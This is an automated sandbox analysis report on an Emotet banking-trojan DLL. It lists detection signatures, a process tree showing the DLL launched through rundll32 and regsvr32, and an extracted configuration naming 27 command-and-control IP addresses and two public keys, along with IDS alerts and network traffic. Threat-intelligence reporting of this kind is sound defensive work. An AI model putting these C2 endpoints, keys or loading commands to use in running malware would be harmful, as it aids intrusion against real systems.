Play interactive tour

Edit tour

Windows Analysis Report M2hsMd9hTq

Overview

General Information

Sample Name:	M2hsMd9hTq (renamed file extension from none to dll)
Analysis ID:	553120
MD5:	707ec8851adeff69bdb3204692c340a8
SHA1:	b51315290d9b490c55663a572bd85999f3267b7a
SHA256:	a6d1ed377e3de0ae885c14ca65c2eafba01207e058ac353289182800a95b5fea
Tags:	32dllexetrojan
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Changes security center settings (notifications, updates, antivirus, firewall)

Machine Learning detection for sample

Sigma detected: Suspicious Call by Ordinal

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

PE file contains strange resources

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Registers a DLL

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries disk information (often used to detect virtual machines)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 328 cmdline: loaddll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 5872 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4892 cmdline: rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 984 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 2512 cmdline: regsvr32.exe /s C:\Users\user\Desktop\M2hsMd9hTq.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

rundll32.exe (PID: 3256 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4940 cmdline: rundll32.exe C:\Users\user\Desktop\M2hsMd9hTq.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1264 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zxfif\dcctxlgarqbqh.hrz",JFJwcZZNDUCWxQ MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4652 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Zxfif\dcctxlgarqbqh.hrz",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 3224 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5516 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4488 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1404 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4564 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 2224 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 780 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 5536 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 5500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 3000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4624 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1560 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.247708165.0000000004ED0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.764384798.0000000005D70000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.251269260.0000000004DB1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.764593172.0000000005FD0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.250801502.0000000004CC0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.251317536.0000000004E60000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.763160491.00000000054F0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.251543763.0000000005450000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.254580749.0000000002791000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.763467558.0000000005790000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.764153228.0000000005C70000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.763888533.0000000005AA1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.763578627.0000000005870000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.763623141.00000000058A1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.761812038.0000000003361000.00000020.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.251440561.0000000004FC0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.250842742.0000000003070000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.763204211.0000000005521000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.247153008.00000000026D0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.251348106.0000000005341000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.763293110.0000000005601000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.762842466.00000000036E1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.251435374.00000000053F0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.251474105.0000000004FF1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.254179155.00000000023D0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.764675936.0000000006001000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.251540171.0000000005051000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.251287174.0000000005310000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.251612529.00000000051D1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.764435934.0000000005DA1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.763511347.00000000057C1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.251607526.0000000005481000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.763831341.0000000005A70000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.764277951.0000000005CA1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.761623893.0000000003330000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.251214045.0000000004D60000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.763416711.0000000005761000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.251508844.0000000005020000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.762037427.0000000003480000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.250952211.0000000004DF1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.763764045.00000000059C1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.251355041.0000000004E91000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.251487303.0000000005421000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.763708229.0000000005990000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.251578591.00000000051A0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.763252082.00000000055D0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.247759843.0000000005001000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.763375282.0000000005730000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 45 entries

Unpacked PEs

Source	Rule	Description	Author
10.2.rundll32.exe.5d70000.20.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.23d0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5790000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4ed0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5480000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4e90000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5310000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5fd0000.22.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.53f0000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.51a0000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3360000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.40d0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5aa0000.17.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.51d0000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.54f0000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.36e0000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.5020000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5340000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4ff0000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4850000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5600000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.54f0000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.5050000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.55d0000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5730000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.2790000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4db0000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5310000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5450000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4df0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.57c0000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5c70000.18.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4d60000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4cc0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5870000.12.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4fc0000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5a70000.16.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.3070000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5520000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.59c0000.15.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5730000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.6000000.23.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3330000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.5000000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5da0000.21.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5d70000.20.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.26d0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5990000.14.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5870000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.53f0000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3330000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5790000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4e60000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.58a0000.13.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5a70000.16.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5990000.14.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5450000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.5020000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.51a0000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.23d0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4d60000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.26d0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5760000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5c70000.18.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3480000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5ca0000.19.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3480000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.5420000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.3070000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4ed0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.5fd0000.22.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.4cc0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.55d0000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4e60000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.4fc0000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 70 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5872, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\M2hsMd9hTq.dll",#1, ProcessId: 4892

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 8.2.rundll32.exe.5310000.2.raw.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"]}

Multi AV Scanner detection for submitted file

Show sources

Source: M2hsMd9hTq.dll	Virustotal: Detection: 25%			Perma Link
Source: M2hsMd9hTq.dll	ReversingLabs: Detection: 34%

Antivirus detection for URL or domain

Show sources

Source: https://45.138.98.34/1	Avira URL Cloud: Label: malware
Source: https://45.138.98.34/	Avira URL Cloud: Label: malware
Source: https://45.138.98.34:80/qIFNheLVNvvPNSNxkwhjxonGRMtffKSDvVT	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Show sources

Source: M2hsMd9hTq.dll

Joe Sandbox ML: detected

Source: M2hsMd9hTq.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.5:49758 -> 45.138.98.34:80
Source: Traffic	Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.5:49759 -> 69.16.218.101:8080

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 69.16.218.101 144			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.138.98.34 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 45.138.98.34:80
Source: Malware configuration extractor	IPs: 69.16.218.101:8080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.168.220:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 104.131.62.48:8080
Source: Malware configuration extractor	IPs: 62.171.178.147:8080
Source: Malware configuration extractor	IPs: 217.182.143.207:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 210.57.209.142:8080
Source: Malware configuration extractor	IPs: 159.69.237.188:443
Source: Malware configuration extractor	IPs: 116.124.128.206:8080
Source: Malware configuration extractor	IPs: 128.199.192.135:8080
Source: Malware configuration extractor	IPs: 195.154.146.35:443
Source: Malware configuration extractor	IPs: 185.148.168.15:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 190.90.233.66:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 104.131.62.48 104.131.62.48

Source: global traffic

TCP traffic: 192.168.2.5:49759 -> 69.16.218.101:8080

Source: unknown

Network traffic detected: IP country count 12

Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101

Source: svchost.exe, 00000021.00000003.571824588.000002A23118D000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
